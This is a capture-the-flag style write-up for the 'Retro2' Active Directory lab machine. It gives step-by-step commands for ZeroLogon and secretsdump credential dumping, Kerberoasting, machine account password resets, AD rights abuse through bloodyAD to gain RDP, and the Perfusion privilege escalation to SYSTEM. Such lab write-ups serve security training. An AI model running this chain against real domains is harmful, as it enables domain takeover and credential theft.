Machine (Easy) - Retro2
Writeup for the Retro2 machine, an easy-level Windows Active Directory box by xct. The attack chain involves enumeration via guest access, machine account manipulation, Kerberoasting, and abuse of AD rights to reach Domain User access via RDP, followed by token impersonation exploit for the local privilege escalation.
Writeup Author: BobBuilder
Objective: Abuse machine account misconfigurations and AD object permissions to gain RDP access, then escalate to SYSTEM.
| Category | Difficulty | Platform | Machine Author |
|---|---|---|---|
| Machine | Easy | Windows | xct |
User
Enumerate AD Users via Guest Access
We start with lookupsid to enumerate users anonymously:
impacket-lookupsid retro2.vl/guest:''@retro2.vl -no-pass | grep SidTypeUser | awk -F ' ' '{print $2}'
This reveals a long list of domain users and machine accounts.
Machine Account Hash Capture with Responder
We capture the NTLMv2 hash of a machine account:
# Responder output
BLN01$::RETRO2:<...>:<...>
ZeroLogon Exploit for DC Sync
Using ZeroLogon on the BLN01 system:
python3 zerologon.py BLN01 <retro2_ip>
impacket-secretsdump -just-dc Bln01\$@<retro2_ip> -no-pass
This allows dumping the domain's secrets.
Kerberoasting Machine Accounts
We extract SPNs to identify service accounts with Kerberos pre-auth:
impacket-GetUserSPNs -target-domain retro2.vl -usersfile retro_users.txt retro2.vl/guest -no-pass
Cracked credentials:
RETRO2\FS01$:<REDACTED>
RETRO2\FS02$:<REDACTED>
Change Machine Account Passwords
We change passwords of FS01 and FS02 machine accounts:
impacket-changepasswd 'retro2.vl/<REDACTED>':fs01@retro2.vl -newpass Password1 -dc-ip <retro2_ip> -p rpc-samr
impacket-changepasswd 'retro2.vl/<REDACTED>':fs02@retro2.vl -newpass Password1 -dc-ip <retro2_ip> -p rpc-samr
Check for Certificate Template Misconfigs
certipy-ad find -vulnerable -u 'FS02$@BLN01.retro2.vl' -p 'Password1' -dc-ip <retro2_ip> -stdout
No vulnerable certificate templates found.
SMB Spider to Discover Files
nxc smb retro2.vl -u 'RETRO2\guest' -p '' -M spider_plus -o DOWNLOAD_FLAG=True MAX_FILE_SIZE=1000000
Finds staff.accdb – a Microsoft Access database.
Crack Encrypted Access DB File
office2john staff.accdb | tee officehash
# Hash saved to 'officehash'
Cracked password: <REDACTED>
Extract LDAP Credentials from Access File
From the MS Access DB contents:
retro2\ldapreader : <REDACTED>
Time Sync for Kerberos
Kerberos rejected tickets due to clock skew, so we adjust system time:
ntpdate -q <retro2_ip>
# Offset found: -0.384988
Used faketime to run tools with adjusted system time.
BloodHound Enumeration (Using ldapreader)
faketime -f -0.384988 bloodhound-python -c all -u "ldapreader" -p "<REDACTED>" -d retro2.vl -ns <retro2_ip>
Result: FS01$ and FS02$ (Domain Computers) have GenericWrite over ADMWS01 computer, which can escalate to Remote Desktop Users via Services group.
Modify AD Objects via Machine Account Abuse
- Reset password of
ADMWS01$:
faketime -f -0.384988 python3 bloodyAD.py -d retro2.vl -u 'FS02$' -p Password1 --host <admws01_ip> set password 'ADMWS01$' Password1
- Set
FS02$as owner ofADMWS01:
python3 bloodyAD.py -d retro2.vl -u 'FS02$' -p Password1 --host <admws01_ip> set object ADMWS01 'FS02$'
- Add
ldapreadertoServicesgroup (which is in Remote Desktop Users):
faketime -f -0.384988 python3 bloodyAD.py -d retro2.vl -u 'ADMWS01$' -p Password1 --host <admws01_ip> add groupMember "Services" 'ldapreader'
RDP Access as ldapreader
rdesktop -u ldapreader -p '<REDACTED>' <admws01_ip> -d retro2.vl
Root
Privilege Escalation with Perfusion
We use Perfusion, a token impersonation exploit targeting the RpcEptMapper or Dnscache performance registry keys. This vulnerability allows us to gain SYSTEM privileges by abusing Windows performance counters.
We proceed with the default key:
Perfusion.exe -c cmd -i